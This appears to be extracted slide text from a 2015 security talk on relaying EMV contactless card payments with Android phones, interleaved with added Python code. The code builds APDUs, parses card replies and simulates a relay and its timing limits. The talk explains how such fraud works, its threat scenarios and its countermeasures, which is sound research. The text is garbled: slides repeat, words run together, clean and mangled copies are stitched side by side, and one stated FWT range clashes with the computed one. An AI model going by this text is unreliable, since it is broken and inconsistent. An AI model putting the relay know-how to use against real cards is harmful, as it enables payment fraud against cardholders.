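The SELECT-by-AID command just mentioned, as an added example that is not code from the talk: it builds the ISO/IEC 7816-4 SELECT APDU for a DF name or AID and parses the BER-TLV response with which a card answers SELECT PPSE, pulling out the AIDs the card advertises. That is exactly what a reader, honest or not, has to learn before it can select (or relay) the payment application. The PPSE name and the Visa AID are public EMV identifiers; the response bytes are constructed for this example, not captured from a card.

```python
"""Build the ISO/IEC 7816-4 SELECT APDU and parse the BER-TLV FCI an EMV
contactless card returns. Added example; the response bytes are constructed."""
from typing import List, Tuple

PPSE = b"2PAY.SYS.DDF01"      # Proximity Payment System Environment (public EMV DF name)
SW_OK = b"\x90\x00"            # status word: success
TAG_AID = b"\x4f"              # ADF name / AID inside an application template (61)

def build_select(name: bytes) -> bytes:
    """SELECT by name: CLA=00 INS=A4 P1=04 P2=00, Lc, data, Le=00."""
    if not 1 <= len(name) <= 16:
        raise ValueError("AID / DF name must be 1..16 bytes")
    return b"\x00\xa4\x04\x00" + bytes([len(name)]) + name + b"\x00"

def _read_tag(buf: bytes, i: int) -> Tuple[bytes, int]:
    """BER tag: more bytes follow while the low 5 bits of the first byte are all set
    and bit 8 of each subsequent byte is set."""
    j = i + 1
    if buf[i] & 0x1F == 0x1F:
        while j < len(buf) and buf[j] & 0x80:
            j += 1
        j += 1
    if j > len(buf):
        raise ValueError("truncated tag")
    return buf[i:j], j

def _read_len(buf: bytes, i: int) -> Tuple[int, int]:
    """BER length: short form (< 0x80) or long form (0x8N then N bytes)."""
    if i >= len(buf):
        raise ValueError("missing length")
    first = buf[i]
    if first < 0x80:
        return first, i + 1
    n = first & 0x7F
    if n == 0 or n > 4 or i + 1 + n > len(buf):
        raise ValueError("unsupported or truncated BER length")
    return int.from_bytes(buf[i + 1:i + 1 + n], "big"), i + 1 + n

def parse_tlv(buf: bytes) -> List[Tuple[bytes, bytes]]:
    """One level of TLV objects as (tag, value) pairs; truncated input is an error, not silently ignored."""
    out, i = [], 0
    while i < len(buf):
        tag, i = _read_tag(buf, i)
        length, i = _read_len(buf, i)
        if i + length > len(buf):
            raise ValueError(f"value of tag {tag.hex()} runs past the end of the data")
        out.append((tag, buf[i:i + length]))
        i += length
    return out

def find_all(buf: bytes, wanted: bytes) -> List[bytes]:
    """Every value of `wanted`, descending into constructed tags (bit 6 of the first tag byte)."""
    found = []
    for tag, value in parse_tlv(buf):
        if tag == wanted:
            found.append(value)
        if tag[0] & 0x20:
            found.extend(find_all(value, wanted))
    return found

def split_response(rapdu: bytes) -> Tuple[bytes, bytes]:
    """Response APDU = data || SW1 SW2."""
    if len(rapdu) < 2:
        raise ValueError("response shorter than a status word")
    return rapdu[:-2], rapdu[-2:]

def aids_from_ppse_response(rapdu: bytes) -> List[bytes]:
    """AIDs advertised in the reply to SELECT PPSE; [] when the card answered with an error SW."""
    data, sw = split_response(rapdu)
    if sw != SW_OK:
        return []
    return find_all(data, TAG_AID)

# Constructed sample reply: FCI template (6F) holding the DF name (84) and an
# FCI proprietary template (A5 > BF0C > 61) with one entry for the public Visa AID.
SAMPLE_PPSE_RESPONSE = bytes.fromhex(
    "6F23"                          # FCI template, 35 bytes follow
    + "840E" + PPSE.hex()           # DF name: 2PAY.SYS.DDF01
    + "A511"                        # FCI proprietary template
    + "BF0C0E"                      # FCI issuer discretionary data
    + "610C"                        # application template
    + "4F07A0000000031010"          # AID A0 00 00 00 03 10 10
    + "870101"                      # application priority indicator
    + "9000"                        # SW: success
)
```

The parser refuses truncated objects instead of returning whatever it managed to read; a relay or reader that silently accepts a short FCI would happily select nothing and report success. `find_all` walks constructed templates, so it also works on the FCI returned by the later SELECT AID, where the card nests its data under the same 6F/A5 tags.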

Background (II): MasterCard PayPass, VISA payWave and American Express ExpressPay

Are they secure?
Amount limit on a single transaction
  Up to £20 GBP, 20 €, US$50, 50 CHF, CAD$100 or AUD$100
  cough, cough (http://www.bankinfosecurity.com/android-attack-exploits-visa-emv-flaw-a-7516/op-1)
Sequential contactless payments are limited: after a number of them the terminal asks for the PIN
Protected by the same fraud guarantee as standard transactions (hopefully)

Background (III)

Relay attacks: "On Numbers and Games", J. H. Conway (1976)
Mafia frauds: Y. Desmedt (SecuriCom'88)
  P ↔ V' ··· communication link ··· P' ↔ V (primes mark the dishonest parties)
  Real-time fraud where a fraudulent prover P' and a fraudulent verifier V' cooperate
  Honest prover and verifier: contactless card and Point-of-Sale terminal
  Dishonest prover and verifier: two NFC-enabled Android devices


Android and NFC: A Tale of Love (I): Recap on the evolution of Android NFC support

(timeline figure; vertical axis: NFC operation modes supported, i.e. Reader/Writer, Peer-to-peer, Card-emulation in hardware, Card-emulation in software)

Android 2.3.3 Gingerbread (API level 10): NfcA (ISO/IEC 14443-3A), NfcB (ISO/IEC 14443-3B), NfcF (JIS 6319-4), NfcV (ISO/IEC 15693), IsoDep (ISO/IEC 14443-4), Ndef, NdefFormatable, MifareClassic, MifareUltralight
Android CyanogenMod OS 9.1: IsoPcdA (ISO/IEC 14443-4A), IsoPcdB (ISO/IEC 14443-4B), i.e. software card-emulation (thanks to Doug Yeager)
Android 4.2 Jelly Bean (API level 17): NfcBarcode
Android 4.4 KitKat (API level 19): software card-emulation (HCE) and NfcAdapter.ReaderCallback added

Android and NFC: A Tale of Love (II): Digging into the Android NFC stack

Event-driven framework, nice API support
Two native implementations (depending on the built-in NFC chip): libnfc-nxp and libnfc-nci
NXP dropped in favour of NCI
  Open architecture, not focused on a single chip family
  Open interface between the NFC Controller (NFCC) and the Device Host (DH)
  Standard proposed by the NFC Forum

Android and NFC: A Tale of Love (III): Digging into the Android NFC stack, Reader/Writer mode

Reader/Writer mode cannot be set directly → it is bound to an Android Activity
The Android NFC service selects apps according to the tag definition in their Manifest file
At low level, libnfc-nci uses a reliable mechanism of queues and message passing, the General Kernel Interface (GKI)
  Makes communication between layers and modules easier

(figure: path of a transceive call through the stack)
User App → Tag (NFC developer framework) → NfcService: mTagService.transceive → IPC → TagService → DeviceHost.TagEndPoint <<realize>> NativeNfcTag → JNI: doTransceive → System NFC Library: NativeNfcTag.cpp → libnfc-nci

Android and NFC: A Tale of Love (IV): Digging into the Android NFC stack, HCE mode

A service must be implemented to process commands and replies: extend the HostApduService abstract class and implement its processCommandApdu method
AID-based routing service table: this means you need to declare in advance which AIDs you handle, or the APDUs never reach your service

Android and NFC: A Tale of Love (V): Digging into the Android NFC stack, summary

Description                                        Language(s)   Dependency                  OSS
NFC developer framework (com.android.nfc package)  Java, C++     API level                   Yes
System NFC library (libnfc-nxp or libnfc-nci)      C/C++         Manufacturer                Yes
NFC Android kernel driver                          C             Hardware and manufacturer   Yes
NFC firmware (/system/vendor/firmware directory)   ARM Thumb     Hardware and manufacturer   No

Some useful links
https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/nfc
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/src/com/android/nfc
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/nci
https://android.googlesource.com/platform/external/libnfc-nci/+/master/src
http://nfc-forum.org/our-work/specifications-and-application-documents/specifications/nfc-controller-interface-nci-specifications
http://www.cardsys.dk/download/NFC_Docs/NFC%20Controller%20Interface%20(NCI)%20Technical%20Specification.pdf
http://www.datasheet4u.com/PDF/845670/BCM20793S.html
http://www.datasheet4u.com/PDF/845671/BCM20793SKMLG.html

Android and NFC: A Tale of Love (VI): Some remarkable limitations

Limitation 1: the dishonest verifier communicates with a MIFARE Classic
  libnfc-nci does not allow sending raw ISO/IEC 14443-3 commands
  Caused by the CRC computation performed by the NFCC
  Overcome only if the NFCC is modified
  EMV contactless cards are IsoDep, fully ISO/IEC 14443-compliant, so this limitation does not affect them
Limitation 2: the dishonest prover communicates with an honest verifier
  Device in HCE mode: the AID must be known in advance
  Overcome only if the device is rooted
  The Xposed framework may help to overcome this issue, but needs root permissions

Android and NFC: A Tale of Love (VII): Some remarkable limitations and remarks

Limitation 3: the dishonest prover and the dishonest verifier communicate through a non-reliable peer-to-peer relay channel
  ISO/IEC 14443-4 defines the Frame Waiting Time as FWT = 256 · (16/fc) · 2^FWI, 0 ≤ FWI ≤ 14, where fc = 13.56 MHz
  FWT ∈ [≈302 µs, ≈4.95 s] for FWI = 0 and FWI = 14 respectively (the card announces its FWI in the ATS) → a relay is theoretically possible when the added delay is ≤ FWT, i.e. at most ≈5 s
Concluding Remarks
  Any NFC-enabled device running OTS Android ≥ 4.4 can perform an NFC passive relay attack at APDU level when the specific AID of the honest prover is known and an explicit SELECT is performed
  Any communication involving an APDU-compliant NFC tag (e.g. MIFARE DESFire EV1, Inside MicroPass or Infineon SLE66CL) can also be relayed
And now, let's move to the practice
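The two constraints above, the AID table an HCE service must declare beforehand (HCE mode slide and Limitation 2) and the frame waiting time (Limitation 3), as one added simulation that is not part of the talk's app: an honest terminal runs SELECT PPSE and then SELECT AID against a dishonest prover that forwards APDUs over a relay channel to a mock card, and the runs show which of the two constraints actually stops the relay. The card's behaviour, its FWI, the relay latencies and the terminal's single-S(WTX) policy are assumptions of the model; the FWT formula and the WTXM range follow ISO/IEC 14443-4, and the Visa AID and PPSE name are public EMV identifiers.

```python
"""Passive APDU-level relay, simulated end to end: honest terminal <-> dishonest
prover (card emulation, forwards APDUs) <-> relay channel <-> dishonest verifier
(reader mode) <-> honest EMV card. Added example; nothing here touches NFC hardware."""
import math
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple

FC_HZ = 13.56e6                              # ISO/IEC 14443 carrier frequency
PPSE = b"2PAY.SYS.DDF01"                     # public EMV directory name
VISA_AID = bytes.fromhex("A0000000031010")   # public EMV AID used as the sample card's application
SW_OK, SW_NOT_FOUND, SW_INS = b"\x90\x00", b"\x6a\x82", b"\x6d\x00"
SELECT_HDR = b"\x00\xa4\x04\x00"
WTXM_MAX = 59                                # largest multiplier an S(WTX) request may carry

def fwt_seconds(fwi: int) -> float:
    """Frame Waiting Time, FWT = 256 * (16/fc) * 2^FWI with FWI in 0..14 (sent by the card in its ATS)."""
    if not 0 <= fwi <= 14:
        raise ValueError("FWI must be in 0..14")
    return 256 * (16 / FC_HZ) * 2 ** fwi

FWT_MAX = fwt_seconds(14)                    # about 4.95 s; also the ceiling for any extension

def select_apdu(name: bytes) -> bytes:
    return SELECT_HDR + bytes([len(name)]) + name + b"\x00"

def selected_name(apdu: bytes) -> bytes:
    """DF name / AID carried by a SELECT-by-name APDU, or b'' for any other command."""
    return apdu[5:5 + apdu[4]] if apdu[:4] == SELECT_HDR and len(apdu) > 5 else b""

@dataclass
class EmvCard:
    """Honest prover: answers SELECT for the PPSE and its one AID, rejects everything else."""
    aid: bytes
    fwi: int = 4                             # assumed FWI: FWT about 4.8 ms
    def transceive(self, apdu: bytes) -> bytes:
        name = selected_name(apdu)
        if not name:
            return SW_INS
        if name == PPSE:
            return b"\x61\x09\x4f\x07" + self.aid + SW_OK    # application template with the AID
        if name == self.aid:
            return b"\x6f\x09\x84\x07" + self.aid + SW_OK    # FCI echoing the DF name
        return SW_NOT_FOUND

@dataclass
class Relay:
    """Dishonest prover (emulated card at the PoS) plus dishonest verifier (reader at the card).
    `registered` models the AID table the emulating app must declare before it sees any APDU."""
    card: EmvCard
    registered: Set[bytes]
    one_way: float                           # relay channel delay per direction, seconds
    forwarded: List[bytes] = field(default_factory=list)
    def transceive(self, apdu: bytes) -> Tuple[bytes, float]:
        """(response, seconds the terminal waits for it)."""
        name = selected_name(apdu)
        if name and name not in self.registered:
            return SW_NOT_FOUND, 0.0         # not routed to our service: the real card is never asked
        self.forwarded.append(apdu)
        return self.card.transceive(apdu), 2 * self.one_way

def terminal_exchange(relay: Relay, apdu: bytes, fwt: float, honour_wtx: bool) -> Dict[str, object]:
    """Honest verifier: waits FWT; a slower responder asks once for S(WTX) with multiplier
    ceil(delay/FWT), granted up to FWT_MAX. One request per APDU is a simplification."""
    resp, delay = relay.transceive(apdu)
    wtxm = 0 if delay <= fwt else math.ceil(delay / fwt)
    granted = fwt if wtxm == 0 else min(fwt * wtxm, FWT_MAX)
    if wtxm and (not honour_wtx or wtxm > WTXM_MAX):
        granted = fwt                        # extension refused or not representable
    if delay > granted:
        return {"sw": b"", "data": b"", "wtx": wtxm, "ok": False}   # timeout: card dropped
    return {"sw": resp[-2:], "data": resp[:-2], "wtx": wtxm, "ok": resp[-2:] == SW_OK}

def run_transaction_start(registered: Set[bytes], one_way: float, honour_wtx: bool = True) -> Dict[str, object]:
    """SELECT PPSE then SELECT the advertised AID: the first two steps of a contactless transaction."""
    card = EmvCard(VISA_AID)
    relay = Relay(card, registered, one_way)
    fwt = fwt_seconds(card.fwi)
    steps = [terminal_exchange(relay, select_apdu(PPSE), fwt, honour_wtx)]
    if steps[0]["ok"]:
        aid = steps[0]["data"][4:]           # value of tag 4F in the card's reply
        steps.append(terminal_exchange(relay, select_apdu(aid), fwt, honour_wtx))
    return {"steps": steps, "forwarded": len(relay.forwarded)}
```

Three things the runs show: a SELECT for a name the relay did not register never reaches the card (the APDU is not routed to the emulating service, so forgetting the PPSE name is as fatal as forgetting the AID); a relay channel far slower than the card's FWT still succeeds when the terminal honours S(WTX); and a terminal that refuses extensions drops the relayed card at the very first SELECT. Real cards may chain several S(WTX) requests, so in practice the cap is the terminal's application-level timeout rather than `WTXM_MAX`.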

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1

Distributed Mafia Fraud

BOT

BOTMASTER

BOT

BOT

BOT

BOT

BOT

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36

Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2

Hiding Fraud Locations

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36

Relay Attack Implementation (IV)Resistant Mechanisms

Brief summary of resistant mechanismsDistance-bounding protocols

Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages

Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands

Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36

Related WorkOn relay attacks

2005-2009 First works built on specific hardware

2010 Nokia mobile phones with NFC capability plus a Java MIDletapp

2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device

2014 Active relay attacks with custom hardware and customAndroid firmware

Several works studied delay upon relay channel

Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint

Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 17: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Introduction to NFC (VIII)

NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments

500M NFC payment users expected by 2019

Almost 300 smart phones available at themoment with NFC capabilities

Check httpwwwnfcworldcomnfc-phones-list

Most of them runs Android OS

Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device

If so what are the constraints (whether any exists)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36

Introduction to NFC (VIII)

NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments

500M NFC payment users expected by 2019

Almost 300 smart phones available at themoment with NFC capabilities

Check httpwwwnfcworldcomnfc-phones-list

Most of them runs Android OS

Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device

If so what are the constraints (whether any exists)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36

Background (I)EMV contactless cards

Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines

Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)

Application ID (AID) command

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36


Background (III): Relay attacks and mafia frauds

Relay attacks: "On Numbers and Games", J. H. Conway (1976)
Mafia frauds: Y. Desmedt (SecuriCom'88)
P ⟶ V̄ ··· communication link ··· P̄ ⟶ V
Real-time fraud where a fraudulent prover P̄ and a fraudulent verifier V̄ cooperate
Honest prover and verifier: contactless card and Point-of-Sale terminal
Dishonest prover and verifier: two NFC-enabled Android devices



Android and NFC: A Tale of L♥ve (I): Recap on evolution of Android NFC support

Timeline of tag technologies and NFC operation modes supported:
Android 2.3.3 Gingerbread (API level 10): NfcA (ISO/IEC 14443-3A), NfcB (ISO/IEC 14443-3B), NfcF (JIS 6319-4), NfcV (ISO/IEC 15693), IsoDep (ISO/IEC 14443-4), Ndef, NdefFormatable, MifareClassic, MifareUltralight. Operation modes: Reader/Writer and Peer-to-peer (software), Card-emulation (hardware only)
Android CyanogenMod OS 9.1: IsoPcdA (ISO/IEC 14443-4A), IsoPcdB (ISO/IEC 14443-4B), thanks to Doug Yeager
Android 4.2 Jelly Bean (API level 17): NfcBarcode
Android 4.4 KitKat (API level 19): NfcAdapter.ReaderCallback added. Operation modes: Reader/Writer, Peer-to-peer and Card-emulation (software), Card-emulation (hardware)

Android and NFC: A Tale of L♥ve (II): Digging into the Android NFC stack

Event-driven framework, nice API support
Two native implementations (depending on the built-in NFC chip): libnfc-nxp and libnfc-nci
NXP dropped in favour of NCI:
  Open architecture, not focused on a single chip family
  Open interface between the NFC Controller and the DH (Device Host)
  Standard proposed by the NFC Forum


Android and NFC: A Tale of L♥ve (III): Digging into the Android NFC stack: Reader/Writer mode

Not allowed to be set directly → Android activity
The Android NFC service selects apps according to the tag definition in the Manifest file
At low level, libnfc-nci uses a reliable mechanism of queues and message passing: the General Kernel Interface (GKI)
  Makes communication between layers and modules easier
[Figure: path of a transceive call. User App → NFC developer framework (Tag → NfcService, mTagService.transceive) → IPC → TagService → DeviceHost.TagEndPoint <<realize>> NativeNfcTag → JNI doTransceive → System NFC Library (NativeNfcTag.cpp, libnfc-nci)]

Android and NFC: A Tale of L♥ve (IV): Digging into the Android NFC stack: HCE mode

A service must be implemented to process commands and replies: HostApduService abstract class and processCommandApdu method
AID-based routing: service table
This means you need to declare in advance what AID you handle

Android and NFC: A Tale of L♥ve (V): Digging into the Android NFC stack: Summary

Description                                        | Language(s) | Dependency                | OSS
NFC developer framework (com.android.nfc package)  | Java, C++   | API level                 | Yes
System NFC library (libnfc-nxp or libnfc-nci)      | C/C++       | Manufacturer              | Yes
NFC Android kernel driver                          | C           | Hardware and manufacturer | Yes
NFC firmware (/system/vendor/firmware directory)   | ARM Thumb   | Hardware and manufacturer | No

Some useful links:
https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/nfc
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/src/com/android/nfc
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/nci
https://android.googlesource.com/platform/external/libnfc-nci/+/master/src
http://nfc-forum.org/our-work/specifications-and-application-documents/specifications/nfc-controller-interface-nci-specifications
http://www.cardsys.dk/download/NFC_Docs/NFC%20Controller%20Interface%20(NCI)%20Technical%20Specification.pdf
http://www.datasheet4u.com/PDF/845670/BCM20793S.html
http://www.datasheet4u.com/PDF/845671/BCM20793SKMLG.html

Android and NFC: A Tale of L♥ve (VI): Some remarkable limitations

Limitation 1: Dishonest verifier communicates with a MIFARE Classic
libnfc-nci does not allow sending raw ISO/IEC 14443-3 commands
  Caused by the CRC computation performed by the NFCC
  Can be overcome if the NFCC is modified
EMV contactless cards are IsoDep, fully ISO/IEC 14443-compliant

Limitation 2: Dishonest prover communicates with an honest verifier
Device in HCE mode: the AID must be known in advance
  Can be overcome if the device is rooted
  Xposed framework may help to overcome this issue, but needs root permissions


Android and NFC: A Tale of L♥ve (V): Some remarkable limitations and remarks

Limitation 3: Dishonest prover and dishonest verifier communicate through a non-reliable peer-to-peer relay channel
ISO/IEC 14443-4 defines the Frame Waiting Time as FWT = 256 · (16/fc) · 2^FWI, 0 ≤ FWI ≤ 14, where fc = 13.56 MHz
FWT ∈ [500 µs, 5 s] → relay is theoretically possible when the delay is ≤ 5 s

Concluding remarks
Any NFC-enabled device running OTS Android ≥ 4.4 can perform an NFC passive relay attack at APDU level when the specific AID of the honest prover is known and an explicit SELECT is performed
Any communication involving an APDU-compliant NFC tag (i.e. MIFARE DESFire EV1, Inside MicroPass or Infineon SLE66CL) can also be relayed
And now, let's move to the practice
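The FWT formula on this slide evaluated for every legal FWI, together with a reader-side check of a single command/response exchange, as an added example (not code from the deck or from the authors' relay app). The S(WTX) multiplier range 1..59 comes from ISO/IEC 14443-4; the rule that each honoured extension request adds wtxm × FWT of budget is a modelling simplification, and the 40 ms reply delay is a constructed value.

```python
"""ISO/IEC 14443-4 Frame Waiting Time (FWT) and why it alone does not stop a relay.

Added example, not code from the HITB'15 deck or its relay app.  It evaluates
FWT = 256 * (16 / fc) * 2**FWI with fc = 13.56 MHz and models the reader-side
decision for one command/response exchange: did the reply arrive within the
window the card announced, and how far does that window stretch if the reader
honours S(WTX) waiting-time-extension requests (the "timing extension commands"
the deck mentions)?  All delay values below are constructed.
"""
from typing import Dict

FC_HZ = 13.56e6   # carrier frequency fc
FWI_MAX = 14      # ISO/IEC 14443-4: 0 <= FWI <= 14 (the card announces FWI in its ATS)
WTXM_MAX = 59     # largest multiplier an S(WTX) request may carry (valid range 1..59)


def fwt_seconds(fwi: int) -> float:
    """Frame Waiting Time for a Frame Waiting Integer, straight from the formula."""
    if not 0 <= fwi <= FWI_MAX:
        raise ValueError(f"FWI must be in 0..{FWI_MAX}, got {fwi}")
    return 256 * (16 / FC_HZ) * (2 ** fwi)


def fwt_table() -> Dict[int, float]:
    """All fifteen legal windows, FWI -> FWT in seconds (about 302 us up to about 4.95 s)."""
    return {fwi: fwt_seconds(fwi) for fwi in range(FWI_MAX + 1)}


def max_tolerated_delay(fwi: int, allowed_wtx: int = 0, wtxm: int = WTXM_MAX) -> float:
    """Longest response delay a reader accepts when it honours at most `allowed_wtx`
    S(WTX) requests, each carrying multiplier `wtxm`.
    Modelling assumption: every honoured request opens a fresh window of wtxm * FWT
    after the current one, so the budget grows linearly with the number of requests."""
    if not 1 <= wtxm <= WTXM_MAX:
        raise ValueError(f"WTXM must be in 1..{WTXM_MAX}, got {wtxm}")
    if allowed_wtx < 0:
        raise ValueError("allowed_wtx must be >= 0")
    return fwt_seconds(fwi) * (1 + allowed_wtx * wtxm)


def classify_exchange(fwi: int, measured_delay_s: float, allowed_wtx: int = 0) -> str:
    """Reader-side verdict for one APDU exchange:
    'ok'        the reply fits the plain FWT the card announced,
    'needs-wtx' the reply only fits because the reader honoured extension requests,
    'timeout'   the reply is outside every window the reader is willing to grant."""
    if measured_delay_s <= fwt_seconds(fwi):
        return "ok"
    if measured_delay_s <= max_tolerated_delay(fwi, allowed_wtx):
        return "needs-wtx"
    return "timeout"


if __name__ == "__main__":
    for fwi, fwt in fwt_table().items():
        print(f"FWI={fwi:2d}  FWT={fwt * 1e3:10.3f} ms")
    # Constructed scenario: a card announcing FWI=4 (about 4.8 ms) and a reply that
    # took 40 ms to come back.  With no extensions honoured it is a timeout; a single
    # honoured S(WTX) with WTXM=59 already makes the same reply acceptable.
    for wtx in (0, 1):
        print(f"FWI=4, delay=40 ms, honoured WTX={wtx}: {classify_exchange(4, 0.040, wtx)}")
    print(f"FWI=14, delay=40 ms: {classify_exchange(14, 0.040)}")
```

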